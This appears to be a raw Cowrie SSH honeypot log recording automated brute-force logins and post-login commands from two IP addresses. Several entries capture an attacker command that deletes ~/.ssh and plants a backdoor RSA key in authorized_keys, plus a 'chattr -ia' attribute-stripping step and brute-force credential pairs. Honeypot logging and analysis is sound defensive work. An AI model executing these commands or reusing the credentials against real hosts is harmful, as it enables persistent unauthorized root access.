{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:25:43.077936Z","src_ip":"118.26.39.178","session":"44ef07bbaf0c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:25:43.687009Z","src_ip":"118.26.39.178","session":"44ef07bbaf0c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:25:43.688112Z","src_ip":"118.26.39.178","session":"44ef07bbaf0c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:25:43.949200Z","src_ip":"118.26.39.178","session":"44ef07bbaf0c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:25:43.950535Z","src_ip":"118.26.39.178","session":"44ef07bbaf0c"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":59386,"dst_ip":"1.2.3.4","dst_port":22,"session":"3afc41201193","protocol":"ssh","message":"New connection: 118.26.39.178:59386 (1.2.3.4:22) [session: 3afc41201193]","sensor":"my-vps","timestamp":"2025-09-09T06:25:44.207484Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:25:44.208343Z","src_ip":"118.26.39.178","session":"3afc41201193"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:25:45.469914Z","src_ip":"118.26.39.178","session":"3afc41201193"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:25:46.257646Z","src_ip":"118.26.39.178","session":"3afc41201193"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:25:47.525391Z","src_ip":"118.26.39.178","session":"3afc41201193"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":39814,"dst_ip":"1.2.3.4","dst_port":22,"session":"4bfd0510c8a9","protocol":"ssh","message":"New connection: 118.26.39.178:39814 (1.2.3.4:22) [session: 4bfd0510c8a9]","sensor":"my-vps","timestamp":"2025-09-09T06:25:47.673524Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:25:47.674779Z","src_ip":"118.26.39.178","session":"4bfd0510c8a9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:25:47.879910Z","src_ip":"118.26.39.178","session":"4bfd0510c8a9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:25:48.742072Z","src_ip":"118.26.39.178","session":"4bfd0510c8a9"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:25:48.954047Z","src_ip":"118.26.39.178","session":"4bfd0510c8a9"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:25:49.011334Z","src_ip":"118.26.39.178","session":"44ef07bbaf0c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47640,"dst_ip":"1.2.3.4","dst_port":22,"session":"19546a706ee4","protocol":"ssh","message":"New connection: 212.227.235.229:47640 (1.2.3.4:22) [session: 19546a706ee4]","sensor":"my-vps","timestamp":"2025-09-09T06:25:49.843727Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:25:49.844571Z","src_ip":"212.227.235.229","session":"19546a706ee4"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:25:50.203725Z","src_ip":"212.227.235.229","session":"19546a706ee4"}
{"eventid":"cowrie.login.success","username":"root","password":"Password06","message":"login attempt [root/Password06] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:25:51.720046Z","src_ip":"212.227.235.229","session":"19546a706ee4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:25:52.479326Z","src_ip":"212.227.235.229","session":"19546a706ee4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:25:52.480336Z","src_ip":"212.227.235.229","session":"19546a706ee4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:25:52.481740Z","src_ip":"212.227.235.229","session":"19546a706ee4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:25:53.196177Z","src_ip":"212.227.235.229","session":"19546a706ee4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49908,"dst_ip":"1.2.3.4","dst_port":22,"session":"04fc68f8324e","protocol":"ssh","message":"New connection: 212.227.235.229:49908 (1.2.3.4:22) [session: 04fc68f8324e]","sensor":"my-vps","timestamp":"2025-09-09T06:25:53.269978Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:25:53.270939Z","src_ip":"212.227.235.229","session":"04fc68f8324e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:25:53.382630Z","src_ip":"212.227.235.229","session":"04fc68f8324e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:25:53.627342Z","src_ip":"212.227.235.229","session":"19546a706ee4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:25:53.627844Z","src_ip":"212.227.235.229","session":"19546a706ee4"}
{"eventid":"cowrie.login.success","username":"root","password":"admin@1234","message":"login attempt [root/admin@1234] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:25:53.867997Z","src_ip":"212.227.235.229","session":"04fc68f8324e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:25:53.959569Z","src_ip":"212.227.235.229","session":"19546a706ee4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:25:53.960665Z","src_ip":"212.227.235.229","session":"19546a706ee4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:25:54.173896Z","src_ip":"212.227.235.229","session":"04fc68f8324e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:25:54.174896Z","src_ip":"212.227.235.229","session":"04fc68f8324e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:25:54.176251Z","src_ip":"212.227.235.229","session":"04fc68f8324e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:25:54.288551Z","src_ip":"212.227.235.229","session":"04fc68f8324e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48764,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d3fc0b1141e","protocol":"ssh","message":"New connection: 212.227.235.229:48764 (1.2.3.4:22) [session: 6d3fc0b1141e]","sensor":"my-vps","timestamp":"2025-09-09T06:25:54.351424Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:25:54.352947Z","src_ip":"212.227.235.229","session":"6d3fc0b1141e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:25:54.532177Z","src_ip":"212.227.235.229","session":"04fc68f8324e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:25:54.533351Z","src_ip":"212.227.235.229","session":"04fc68f8324e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:25:54.661921Z","src_ip":"212.227.235.229","session":"04fc68f8324e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:25:54.663255Z","src_ip":"212.227.235.229","session":"04fc68f8324e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62475,"dst_ip":"1.2.3.4","dst_port":22,"session":"019f49e06a66","protocol":"ssh","message":"New connection: 212.227.235.229:62475 (1.2.3.4:22) [session: 019f49e06a66]","sensor":"my-vps","timestamp":"2025-09-09T06:25:54.769151Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:25:54.795077Z","src_ip":"212.227.235.229","session":"019f49e06a66"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:25:54.828738Z","src_ip":"212.227.235.229","session":"6d3fc0b1141e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:25:54.904030Z","src_ip":"212.227.235.229","session":"019f49e06a66"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:25:55.345011Z","src_ip":"212.227.235.229","session":"019f49e06a66"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:25:56.462605Z","src_ip":"212.227.235.229","session":"019f49e06a66"}
